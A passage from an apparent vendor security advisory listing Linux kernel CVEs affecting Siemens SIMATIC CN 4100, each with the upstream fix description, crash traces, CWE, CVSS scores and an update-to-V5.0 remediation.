0010:native_read_pmc+0x7/0x40 Code: cc e8 8d a9 01 00 48 89 03 5b cd cc cc cc cc 0f 1f ... RSP: 000:fffb03100273de8 EFLAGS: 00010046 .... Call Trace: icl_update_topdown_event+0x165/0x190 ? ktime_get+0x38/0xd0 intel_pmu_read_event+0xf9/0x210 __perf_event_read+0xf9/0x210 CPUs 16-23 are E-core CPUs that don't support the perf metrics feature. The icl_update_topdown_event() should not be invoked on these CPUs. It's a regression of commit: f9bdf1f95339 ("perf/x86/intel: Avoid disable PMU if !cpuc->enabled in sample read") The bug introduced by that commit is that the is_topdown_event() function is mistakenly used to replace the is_topdown_count() call to check if the topdown functions for the perf metrics feature should be invoked. Fix it. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38347 In the Linux kernel, the following vulnerability has been resolved: f2fs: fix to do sanity check on ino and xnid syzbot reported a f2fs bug as below: INFO: task syz-executor140:5308 blocked for more than 143 seconds. Not tainted 6.14.0-rc7-syzkaller-00069-g81e4f8d68c66 #0 "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message. task:syz-executor140 state:D stack:24016 pid:5308 tgid:5308 ppid:5306 task_flags:0x400140 flags:0x00000006 Call Trace: context_switch kernel/sched/core.c:5378 [inline] __schedule+0x190e/0x4c90 kernel/sched/core.c:6765 __schedule_loop kernel/sched/core.c:6842 [inline] schedule+0x14b/0x320 kernel/sched/core.c:6857 io_schedule+0x8d/0x110 kernel/sched/core.c:7690 folio_wait_bit_common+0x839/0xee0 mm/filemap.c:1317 __folio_lock mm/filemap.c:1664 [inline] folio_lock include/linux/pagemap.h:1163 [inline] __filemap_get_folio+0x147/0xb40 mm/filemap.c:1917 pagecache_get_page+0x2c/0x130 mm/folio-compat.c:87 find_get_page_flags include/linux/pagemap.h:842 [inline] f2fs_grab_cache_page+0x2b/0x320 fs/f2fs/f2fs.h:2776 __get_node_page+0x131/0x11b0 fs/f2fs/node.c:1463 read_xattr_block+0xfb/0x190 fs/f2fs/xattr.c:306 lookup_all_xattrs fs/f2fs/xattr.c:355 [inline] f2fs_getxattr+0x676/0xf70 fs/f2fs/xattr.c:533 __f2fs_get_acl+0x52/0x870 fs/f2fs/acl.c:179 f2fs_acl_create fs/f2fs/acl.c:375 [inline] f2fs_init_acl+0xd7/0x9b0 fs/f2fs/acl.c:418 f2fs_init_inode_metadata+0xa0f/0x1050 fs/f2fs/dir.c:539 f2fs_add_inline_entry+0x448/0x860 fs/f2fs/inline.c:666 f2fs_add_dentry+0xba/0x1e0 fs/f2fs/dir.c:765 f2fs_do_add_link+0x28c/0x3a0 fs/f2fs/dir.c:808 f2fs_add_link fs/f2fs/f2fs.h:3616 [inline] f2fs_mknod+0x2e8/0x5b0 fs/f2fs/namei.c:766 vfs_mknod+0x36d/0x3b0 fs/namei.c:4191 unix_bind_bsd net/unix/af_unix.c:1286 [inline] unix_bind+0x563/0xe30 net/unix/af_unix.c:1379 __sys_bind_socket net/socket.c:1817 [inline] __sys_bind+0x1e4/0x290 net/socket.c:1848 __do_sys_bind net/socket.c:1853 [inline] __se_sys_bind net/socket.c:1851 [inline] __x64_sys_bind+0x7a/0x90 net/socket.c:1851 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xf3/0x230 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x77/0x7f Let's dump and check metadata of corrupted inode, it shows its xattr_nid is the same to its i_ino. dump.f2fs -i 3 chaseyu.img.raw i_xattr_nid [0x 3 : 3] So that, during mknod in the corrupted directory, it tries to get and lock inode page twice, result in deadlock. - f2fs_mknod - f2fs_add_inline_entry - f2fs_get_inode_page --- lock dir's inode page - f2fs_init_acl - f2fs_acl_create(dir,..) - __f2fs_get_acl - f2fs_getxattr - lookup_all_xattrs - __get_node_page --- try to lock dir's inode page In order to fix this, let's add sanity check on ino and xnid. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38491 In the Linux kernel, the following vulnerability has been resolved: mptcp: make fallback action and fallback decision atomic Syzkaller reported the following splat: WARNING: CPU: 1 PID: 7704 at net/mptcp/protocol.h:1223 __mptcp_do_fallback net/mptcp/protocol.h:1223 [inline] WARNING: CPU: 1 PID: 7704 at net/mptcp/protocol.h:1223 mptcp_do_fallback net/mptcp/protocol.h:1244 [inline] WARNING: CPU: 1 PID: 7704 at net/mptcp/protocol.h:1223 check_fully_established net/mptcp/options.c:982 [inline] WARNING: CPU: 1 PID: 7704 at net/mptcp/protocol.h:1223 mptcp_incoming_options+0x21a8/0x2510 net/mptcp/options.c:1153 Modules linked in: CPU: 1 UID: 0 PID: 7704 Comm: syz.3.1419 Not tainted 6.16.0-rc3-gbd5ce2324dba #20 PREEMPT(voluntary) Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014 RIP: 0010:__mptcp_do_fallback net/mptcp/protocol.h:1223 [inline] RIP: 0010:mptcp_do_fallback net/mptcp/protocol.h:1244 [inline] RIP: 0010:check_fully_established net/mptcp/options.c:982 [inline] RIP: 0010:mptcp_incoming_options+0x21a8/0x2510 net/mptcp/options.c:1153 Code: 24 18 e8 bb 2a 00 fd e9 1b df ff ff e8 b1 21 0f 00 e8 ec 5f c4 fc 44 0f b7 ac 24 b0 00 00 00 e9 54 f1 ff ff e8 d9 5f c4 fc 90 0b 90 e9 b8 f4 ff ff e8 8b 2a 00 fd e9 8d e6 ff ff e8 81 2a 00 RSP: 0018:ffff8880a3f08448 EFLAGS: 00010246 RAX: 0000000000000000 RBX: ffff8880180a8000 RCX: ffffffff84afcf45 RDX: ffff888090223700 RSI: ffffffff84afdaa7 RDI: 0000000000000001 RBP: ffff888017955780 R08: 0000000000000001 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000000 R13: ffff8880180a8910 R14: ffff8880a3e9d058 R15: 0000000000000000 FS: 00005555791b8500(0000) GS:ffff88811c495000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 000000110c2800b7 CR3: 0000000058e44000 CR4: 0000000000350ef0 Call Trace: tcp_reset+0x26f/0x2b0 net/ipv4/tcp_input.c:4432 tcp_validate_incoming+0x1057/0x1b60 net/ipv4/tcp_input.c:5975 tcp_rcv_established+0x5b5/0x21f0 net/ipv4/tcp_input.c:6166 tcp_v4_do_rcv+0x5dc/0xa70 net/ipv4/tcp_ipv4.c:1925 tcp_v4_rcv+0x3473/0x44a0 net/ipv4/tcp_ipv4.c:2363 ip_protocol_deliver_rcu+0xba/0x480 net/ipv4/ip_input.c:205 ip_local_deliver_finish+0x2f1/0x500 net/ipv4/ip_input.c:233 NF_HOOK include/linux/netfilter.h:317 [inline] NF_HOOK include/linux/netfilter.h:311 [inline] ip_local_deliver+0x1be/0x560 net/ipv4/ip_input.c:254 dst_input include/net/dst.h:469 [inline] ip_rcv_finish net/ipv4/ip_input.c:447 [inline] NF_HOOK include/linux/netfilter.h:317 [inline] NF_HOOK include/linux/netfilter.h:311 [inline] ip_rcv+0x514/0x810 net/ipv4/ip_input.c:567 __netif_receive_skb_one_core+0x197/0x1e0 net/core/dev.c:5975 __netif_receive_skb+0x1f/0x120 net/core/dev.c:6088 process_backlog+0x301/0x1360 net/core/dev.c:6440 __napi_poll.constprop.0+0xba/0x550 net/core/dev.c:7453 napi_poll net/core/dev.c:7517 [inline] net_rx_action+0xb44/0x1010 net/core/dev.c:7644 handle_softirqs+0x1d0/0x770 kernel/softirq.c:579 do_softirq+0x3f/0x90 kernel/softirq.c:480 __local_bh_enable_ip+0xed/0x110 kernel/softirq.c:407 local_bh_enable include/linux/bottom_half.h:33 [inline] inet_csk_listen_stop+0x2c5/0x1070 net/ipv4/inet_connection_sock.c:1524 mptcp_check_listen_stop.part.0+0x1cc/0x220 net/mptcp/protocol.c:2985 mptcp_check_listen_stop net/mptcp/mib.h:118 [inline] __mptcp_close+0x9b9/0xbd0 net/mptcp/protocol.c:3000 mptcp_close+0x2f/0x140 net/mptcp/protocol.c:3066 inet_release+0xed/0x200 net/ipv4/af_inet.c:435 inet6_release+0x4f/0x70 net/ipv6/af_inet6.c:487 __sock_release+0xb3/0x270 net/socket.c:649 sock_close+0x1c/0x30 net/socket.c:1439 __fput+0x402/0xb70 fs/file_table.c:465 task_work_run+0x150/0x240 kernel/task_work.c:227 resume_user_mode_work include/linux/resume_user_mode.h:50 [inline] exit_to_user_mode_loop+0xd4 ---truncated--- View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-667 Improper Locking Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38502 In the Linux kernel, the following vulnerability has been resolved: bpf: Fix oob access in cgroup local storage Lonial reported that an out-of-bounds access in cgroup local storage can be crafted via tail calls. Given two programs each utilizing a cgroup local storage with a different value size, and one program doing a tail call into the other. The verifier will validate each of the indivial programs just fine. However, in the runtime context the bpf_cg_run_ctx holds an bpf_prog_array_item which contains the BPF program as well as any cgroup local storage flavor the program uses. Helpers such as bpf_get_local_storage() pick this up from the runtime context: ctx = container_of(current->bpf_ctx, struct bpf_cg_run_ctx, run_ctx); storage = ctx->prog_item->cgroup_storage[stype]; if (stype == BPF_CGROUP_STORAGE_SHARED) ptr = &READ_ONCE(storage->buf)->data[0]; else ptr = this_cpu_ptr(storage->percpu_buf); For the second program which was called from the originally attached one, this means bpf_get_local_storage() will pick up the former program's map, not its own. With mismatching sizes, this can result in an unintended out-of-bounds access. To fix this issue, we need to extend bpf_map_owner with an array of storage_cookie[] to match on i) the exact maps from the original program if the second program was using bpf_get_local_storage(), or ii) allow the tail call combination if the second program was not using any of the cgroup local storage maps. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-125 Out-of-bounds Read Metrics CVSS Version Base Score Base Severity Vector String 3.1 4 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L CVE-2025-38552 In the Linux kernel, the following vulnerability has been resolved: mptcp: plug races between subflow fail and subflow creation We have races similar to the one addressed by the previous patch between subflow failing and additional subflow creation. They are just harder to trigger. The solution is similar. Use a separate flag to track the condition 'socket state prevent any additional subflow creation' protected by the fallback lock. The socket fallback makes such flag true, and also receiving or sending an MP_FAIL option. The field 'allow_infinite_fallback' is now always touched under the relevant lock, we can drop the ONCE annotation on write. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.3 MEDIUM CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H CVE-2025-38614 In the Linux kernel, the following vulnerability has been resolved: eventpoll: Fix semi-unbounded recursion Ensure that epoll instances can never form a graph deeper than EP_MAX_NESTS+1 links. Currently, ep_loop_check_proc() ensures that the graph is loop-free and does some recursion depth checks, but those recursion depth checks don't limit the depth of the resulting tree for two reasons: - They don't look upwards in the tree. - If there are multiple downwards paths of different lengths, only one of the paths is actually considered for the depth check since commit 28d82dc1c4ed ("epoll: limit paths"). Essentially, the current recursion depth check in ep_loop_check_proc() just serves to prevent it from recursing too deeply while checking for loops. A more thorough check is done in reverse_path_check() after the new graph edge has already been created; this checks, among other things, that no paths going upwards from any non-epoll file with a length of more than 5 edges exist. However, this check does not apply to non-epoll files. As a result, it is possible to recurse to a depth of at least roughly 500, tested on v6.15. (I am unsure if deeper recursion is possible; and this may have changed with commit 8c44dac8add7 ("eventpoll: Fix priority inversion problem").) To fix it: 1. In ep_loop_check_proc(), note the subtree depth of each visited node, and use subtree depths for the total depth calculation even when a subtree has already been visited. 2. Add ep_get_upwards_depth_proc() for similarly determining the maximum depth of an upwards walk. 3. In ep_loop_check(), use these values to limit the total path length between epoll nodes to EP_MAX_NESTS edges. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-674 Uncontrolled Recursion Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38670 In the Linux kernel, the following vulnerability has been resolved: arm64/entry: Mask DAIF in cpu_switch_to(), call_on_irq_stack() `cpu_switch_to()` and `call_on_irq_stack()` manipulate SP to change to different stacks along with the Shadow Call Stack if it is enabled. Those two stack changes cannot be done atomically and both functions can be interrupted by SErrors or Debug Exceptions which, though unlikely, is very much broken : if interrupted, we can end up with mismatched stacks and Shadow Call Stack leading to clobbered stacks. In `cpu_switch_to()`, it can happen when SP_EL0 points to the new task, but x18 stills points to the old task's SCS. When the interrupt handler tries to save the task's SCS pointer, it will save the old task SCS pointer (x18) into the new task struct (pointed to by SP_EL0), clobbering it. In `call_on_irq_stack()`, it can happen when switching from the task stack to the IRQ stack and when switching back. In both cases, we can be interrupted when the SCS pointer points to the IRQ SCS, but SP points to the task stack. The nested interrupt handler pushes its return addresses on the IRQ SCS. It then detects that SP points to the task stack, calls `call_on_irq_stack()` and clobbers the task SCS pointer with the IRQ SCS pointer, which it will also use ! This leads to tasks returning to addresses on the wrong SCS, or even on the IRQ SCS, triggering kernel panics via CONFIG_VMAP_STACK or FPAC if enabled. This is possible on a default config, but unlikely. However, when enabling CONFIG_ARM64_PSEUDO_NMI, DAIF is unmasked and instead the GIC is responsible for filtering what interrupts the CPU should receive based on priority. Given the goal of emulating NMIs, pseudo-NMIs can be received by the CPU even in `cpu_switch_to()` and `call_on_irq_stack()`, possibly *very* frequently depending on the system configuration and workload, leading to unpredictable kernel panics. Completely mask DAIF in `cpu_switch_to()` and restore it when returning. Do the same in `call_on_irq_stack()`, but restore and mask around the branch. Mask DAIF even if CONFIG_SHADOW_CALL_STACK is not enabled for consistency of behaviour between all configurations. Introduce and use an assembly macro for saving and masking DAIF, as the existing one saves but only masks IF. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38676 In the Linux kernel, the following vulnerability has been resolved: iommu/amd: Avoid stack buffer overflow from kernel cmdline While the kernel command line is considered trusted in most environments, avoid writing 1 byte past the end of "acpiid" if the "str" argument is maximum length. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-805 Buffer Access with Incorrect Length Value Metrics CVSS Version Base Score Base Severity Vector String 3.1 6 MEDIUM CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H CVE-2025-38677 In the Linux kernel, the following vulnerability has been resolved: f2fs: fix to avoid out-of-boundary access in dnode page As Jiaming Zhang reported: __dump_stack lib/dump_stack.c:94 [inline] dump_stack_lvl+0x1c1/0x2a0 lib/dump_stack.c:120 print_address_description mm/kasan/report.c:378 [inline] print_report+0x17e/0x800 mm/kasan/report.c:480 kasan_report+0x147/0x180 mm/kasan/report.c:593 data_blkaddr fs/f2fs/f2fs.h:3053 [inline] f2fs_data_blkaddr fs/f2fs/f2fs.h:3058 [inline] f2fs_get_dnode_of_data+0x1a09/0x1c40 fs/f2fs/node.c:855 f2fs_reserve_block+0x53/0x310 fs/f2fs/data.c:1195 prepare_write_begin fs/f2fs/data.c:3395 [inline] f2fs_write_begin+0xf39/0x2190 fs/f2fs/data.c:3594 generic_perform_write+0x2c7/0x910 mm/filemap.c:4112 f2fs_buffered_write_iter fs/f2fs/file.c:4988 [inline] f2fs_file_write_iter+0x1ec8/0x2410 fs/f2fs/file.c:5216 new_sync_write fs/read_write.c:593 [inline] vfs_write+0x546/0xa90 fs/read_write.c:686 ksys_write+0x149/0x250 fs/read_write.c:738 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xf3/0x3d0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f The root cause is in the corrupted image, there is a dnode has the same node id w/ its inode, so during f2fs_get_dnode_of_data(), it tries to access block address in dnode at offset 934, however it parses the dnode as inode node, so that get_dnode_addr() returns 360, then it tries to access page address from 360 + 934 * 4 = 4096 w/ 4 bytes. To fix this issue, let's add sanity check for node id of all direct nodes during f2fs_get_dnode_of_data(). View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38679 In the Linux kernel, the following vulnerability has been resolved: media: venus: Fix OOB read due to missing payload bound check Currently, The event_seq_changed() handler processes a variable number of properties sent by the firmware. The number of properties is indicated by the firmware and used to iterate over the payload. However, the payload size is not being validated against the actual message length. This can lead to out-of-bounds memory access if the firmware provides a property count that exceeds the data available in the payload. Such a condition can result in kernel crashes or potential information leaks if memory beyond the buffer is accessed. Fix this by properly validating the remaining size of the payload before each property access and updating bounds accordingly as properties are parsed. This ensures that property parsing is safely bounded within the received message buffer and protects against malformed or malicious firmware behavior. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38680 In the Linux kernel, the following vulnerability has been resolved: media: uvcvideo: Fix 1-byte out-of-bounds read in uvc_parse_format() The buffer length check before calling uvc_parse_format() only ensured that the buffer has at least 3 bytes (buflen > 2), buf the function accesses buffer[3], requiring at least 4 bytes. This can lead to an out-of-bounds read if the buffer has exactly 3 bytes. Fix it by checking that the buffer has at least 4 bytes in uvc_parse_format(). View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-125 Out-of-bounds Read Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38681 In the Linux kernel, the following vulnerability has been resolved: mm/ptdump: take the memory hotplug lock inside ptdump_walk_pgd() Memory hot remove unmaps and tears down various kernel page table regions as required. The ptdump code can race with concurrent modifications of the kernel page tables. When leaf entries are modified concurrently, the dump code may log stale or inconsistent information for a VA range, but this is otherwise not harmful. But when intermediate levels of kernel page table are freed, the dump code will continue to use memory that has been freed and potentially reallocated for another purpose. In such cases, the ptdump code may dereference bogus addresses, leading to a number of potential problems. To avoid the above mentioned race condition, platforms such as arm64, riscv and s390 take memory hotplug lock, while dumping kernel page table via the sysfs interface /sys/kernel/debug/kernel_page_tables. Similar race condition exists while checking for pages that might have been marked W+X via /sys/kernel/debug/kernel_page_tables/check_wx_pages which in turn calls ptdump_check_wx(). Instead of solving this race condition again, let's just move the memory hotplug lock inside generic ptdump_check_wx() which will benefit both the scenarios. Drop get_online_mems() and put_online_mems() combination from all existing platform ptdump code paths. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-366 Race Condition within a Thread Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H CVE-2025-38683 In the Linux kernel, the following vulnerability has been resolved: hv_netvsc: Fix panic during namespace deletion with VF The existing code move the VF NIC to new namespace when NETDEV_REGISTER is received on netvsc NIC. During deletion of the namespace, default_device_exit_batch() >> default_device_exit_net() is called. When netvsc NIC is moved back and registered to the default namespace, it automatically brings VF NIC back to the default namespace. This will cause the default_device_exit_net() >> for_each_netdev_safe loop unable to detect the list end, and hit NULL ptr: [ 231.449420] mana 7870:00:00.0 enP30832s1: Moved VF to namespace with: eth0 [ 231.449656] BUG: kernel NULL pointer dereference, address: 0000000000000010 [ 231.450246] #PF: supervisor read access in kernel mode [ 231.450579] #PF: error_code(0x0000) - not-present page [ 231.450916] PGD 17b8a8067 P4D 0 [ 231.451163] Oops: Oops: 0000 [#1] SMP NOPTI [ 231.451450] CPU: 82 UID: 0 PID: 1394 Comm: kworker/u768:1 Not tainted 6.16.0-rc4+ #3 VOLUNTARY [ 231.452042] Hardware name: Microsoft Corporation Virtual Machine/Virtual Machine, BIOS Hyper-V UEFI Release v4.1 11/21/2024 [ 231.452692] Workqueue: netns cleanup_net [ 231.452947] RIP: 0010:default_device_exit_batch+0x16c/0x3f0 [ 231.453326] Code: c0 0c f5 b3 e8 d5 db fe ff 48 85 c0 74 15 48 c7 c2 f8 fd ca b2 be 10 00 00 00 48 8d 7d c0 e8 7b 77 25 00 49 8b 86 28 01 00 00 8b 50 10 4c 8b 2a 4c 8d 62 f0 49 83 ed 10 4c 39 e0 0f 84 d6 00 [ 231.454294] RSP: 0018:ff75fc7c9bf9fd00 EFLAGS: 00010246 [ 231.454610] RAX: 0000000000000000 RBX: 0000000000000002 RCX: 61c8864680b583eb [ 231.455094] RDX: ff1fa9f71462d800 RSI: ff75fc7c9bf9fd38 RDI: 0000000030766564 [ 231.455686] RBP: ff75fc7c9bf9fd78 R08: 0000000000000000 R09: 0000000000000000 [ 231.456126] R10: 0000000000000001 R11: 0000000000000004 R12: ff1fa9f70088e340 [ 231.456621] R13: ff1fa9f70088e340 R14: ffffffffb3f50c20 R15: ff1fa9f7103e6340 [ 231.457161] FS: 0000000000000000(0000) GS:ff1faa6783a08000(0000) knlGS:0000000000000000 [ 231.457707] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 231.458031] CR2: 0000000000000010 CR3: 0000000179ab2006 CR4: 0000000000b73ef0 [ 231.458434] Call Trace: [ 231.458600] [ 231.458777] ops_undo_list+0x100/0x220 [ 231.459015] cleanup_net+0x1b8/0x300 [ 231.459285] process_one_work+0x184/0x340 To fix it, move the ns change to a workqueue, and take rtnl_lock to avoid changing the netdev list when default_device_exit_net() is using it. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-820 Missing Synchronization Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.2 MEDIUM CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:H CVE-2025-38684 In the Linux kernel, the following vulnerability has been resolved: net/sched: ets: use old 'nbands' while purging unused classes Shuang reported sch_ets test-case [1] crashing in ets_class_qlen_notify() after recent changes from Lion [2]. The problem is: in ets_qdisc_change() we purge unused DWRR queues; the value of 'q->nbands' is the new one, and the cleanup should be done with the old one. The problem is here since my first attempts to fix ets_qdisc_change(), but it surfaced again after the recent qdisc len accounting fixes. Fix it purging idle DWRR queues before assigning a new value of 'q->nbands', so that all purge operations find a consistent configuration: - old 'q->nbands' because it's needed by ets_class_find() - old 'q->nstrict' because it's needed by ets_class_is_strict() BUG: kernel NULL pointer dereference, address: 0000000000000000 #PF: supervisor read access in kernel mode #PF: error_code(0x0000) - not-present page PGD 0 P4D 0 Oops: Oops: 0000 [#1] SMP NOPTI CPU: 62 UID: 0 PID: 39457 Comm: tc Kdump: loaded Not tainted 6.12.0-116.el10.x86_64 #1 PREEMPT(voluntary) Hardware name: Dell Inc. PowerEdge R640/06DKY5, BIOS 2.12.2 07/09/2021 RIP: 0010:__list_del_entry_valid_or_report+0x4/0x80 Code: ff 4c 39 c7 0f 84 39 19 8e ff b8 01 00 00 00 c3 cc cc cc cc 66 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 f3 0f 1e fa 8b 17 48 8b 4f 08 48 85 d2 0f 84 56 19 8e ff 48 85 c9 0f 84 ab RSP: 0018:ffffba186009f400 EFLAGS: 00010202 RAX: 00000000000000d6 RBX: 0000000000000000 RCX: 0000000000000004 RDX: ffff9f0fa29b69c0 RSI: 0000000000000000 RDI: 0000000000000000 RBP: ffffffffc12c2400 R08: 0000000000000008 R09: 0000000000000004 R10: ffffffffffffffff R11: 0000000000000004 R12: 0000000000000000 R13: ffff9f0f8cfe0000 R14: 0000000000100005 R15: 0000000000000000 FS: 00007f2154f37480(0000) GS:ffff9f269c1c0000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000000000000 CR3: 00000001530be001 CR4: 00000000007726f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 PKRU: 55555554 Call Trace: ets_class_qlen_notify+0x65/0x90 [sch_ets] qdisc_tree_reduce_backlog+0x74/0x110 ets_qdisc_change+0x630/0xa40 [sch_ets] __tc_modify_qdisc.constprop.0+0x216/0x7f0 tc_modify_qdisc+0x7c/0x120 rtnetlink_rcv_msg+0x145/0x3f0 netlink_rcv_skb+0x53/0x100 netlink_unicast+0x245/0x390 netlink_sendmsg+0x21b/0x470 ____sys_sendmsg+0x39d/0x3d0 ___sys_sendmsg+0x9a/0xe0 __sys_sendmsg+0x7a/0xd0 do_syscall_64+0x7d/0x160 entry_SYSCALL_64_after_hwframe+0x76/0x7e RIP: 0033:0x7f2155114084 Code: 89 02 b8 ff ff ff ff eb bb 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 f3 0f 1e fa 80 3d 25 f0 0c 00 00 74 13 b8 2e 00 00 00 0f 05 3d 00 f0 ff ff 77 54 c3 0f 1f 00 48 83 ec 28 89 54 24 1c 48 89 RSP: 002b:00007fff1fd7a988 EFLAGS: 00000202 ORIG_RAX: 000000000000002e RAX: ffffffffffffffda RBX: 0000560ec063e5e0 RCX: 00007f2155114084 RDX: 0000000000000000 RSI: 00007fff1fd7a9f0 RDI: 0000000000000003 RBP: 00007fff1fd7aa60 R08: 0000000000000010 R09: 000000000000003f R10: 0000560ee9b3a010 R11: 0000000000000202 R12: 00007fff1fd7aae0 R13: 000000006891ccde R14: 0000560ec063e5e0 R15: 00007fff1fd7aad0 [1] https://lore.kernel.org/netdev/e08c7f4a6882f260011909a868311c6e9b54f3e4.1639153474.git.dcaratti@redhat.com/ [2] https://lore.kernel.org/netdev/d912cbd7-193b-4269-9857-525bee8bbb6a@gmail.com/ View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-476 NULL Pointer Dereference Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.2 MEDIUM CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:H CVE-2025-38685 In the Linux kernel, the following vulnerability has been resolved: fbdev: Fix vmalloc out-of-bounds write in fast_imageblit This issue triggers when a userspace program does an ioctl FBIOPUT_CON2FBMAP by passing console number and frame buffer number. Ideally this maps console to frame buffer and updates the screen if console is visible. As part of mapping it has to do resize of console according to frame buffer info. if this resize fails and returns from vc_do_resize() and continues further. At this point console and new frame buffer are mapped and sets display vars. Despite failure still it continue to proceed updating the screen at later stages where vc_data is related to previous frame buffer and frame buffer info and display vars are mapped to new frame buffer and eventully leading to out-of-bounds write in fast_imageblit(). This bheviour is excepted only when fg_console is equal to requested console which is a visible console and updates screen with 